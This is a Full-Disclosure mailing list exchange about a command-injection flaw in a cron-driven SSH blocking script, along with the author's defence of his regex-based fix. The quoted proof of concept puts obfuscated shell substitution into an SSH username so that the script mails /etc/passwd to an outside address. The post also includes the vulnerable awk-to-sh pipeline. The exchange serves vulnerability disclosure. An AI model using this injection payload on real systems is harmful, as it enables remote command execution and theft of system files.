Tavis Ormandy wrote:
However, it is certainly possible. Here is an example. #!/bin/sh command='$(x=$(pwd|head${IFS}-c1);$(cat<<<mail${IFS}full-disclosure@xxxxxxxxxxxxxxxxx)<${x}etc${x}passwd)' ssh -o "BatchMode yes" "a a $command"@$1 Which produces log entries like this:Nov 28 15:14:15 insomniac sshd[5897]: pam_succeed_if(sshd:auth): error retrieving information about user a a $(x=$(pwd|head${IFS}-c1);$(cat<<<mail${IFS}full-disclosure@xxxxxxxxxxxxxxxxx)<${x}etc${x}passwd)Nov 28 15:14:15 insomniac sshd[5897]: Failed password for invalid user a a $(x=$(pwd|head${IFS}-c1);$(cat<<<mail${IFS}full-disclosure@xxxxxxxxxxxxxxxxx)<${x}etc${x}passwd) from 127.0.0.1 port 47403 ssh2 Note that the 13th field both contains a dot and is entirely controlled by me. This string is placed in /etc/hosts.deny by the script after executed by cron. The $1 in the awk script below is the entire string, which is piped unsanitised into /bin/sh: awk '!/#/ && /\./ && !a[$0]++ {print "iptables -A INPUT -s "$1" -i eth0 -d '$ifaddr' -p TCP --dport 22 -j REJECT"}' /etc/hosts.deny |\ awk '/iptables/ && !/#/ && !/-s -i/'|sh The results are obvious.
Incorrect did you look at the fix? It isn't unsanitized as you state:Firstly data being passed is not coming through via /var/log/secure or /var/log/auth* its coming in via /etc/hosts.deny
function IPT {
grep -E
'(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[1-9])(\.(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])){3}'
/etc/hosts.deny|\
sed 's/::ffff://g'|\ awk '!/#/&&/\./&&!a[$0]++{print "iptables -A INPUT -s "$1" -i eth0 -d 208.51.101.194 -p TCP --dport 22 -j REJECT"}'|\
awk '/iptables/&&!/#/&&!/-s -i/'|sh } [root@voip2 ~]# cat testing.deny 89.96.238.226 219.146.59.225 211.97.194.148 220.110.34.44 2383274298734 sakjdhasiuwe hacker aaa bbb ccc 0wn3d[root@voip2 ~]# grep -E '(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[1-9])(\.(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])){3}' testing.deny
89.96.238.226 219.146.59.225 211.97.194.148 220.110.34.44 So the buck stops there before it is put into the shell. -- ==================================================== J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743sil . infiltrated @ net http://www.infiltrated.net
The happiness of society is the end of government. John Adams
Attachment:
smime.p7s
Description: S/MIME Cryptographic Signature
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/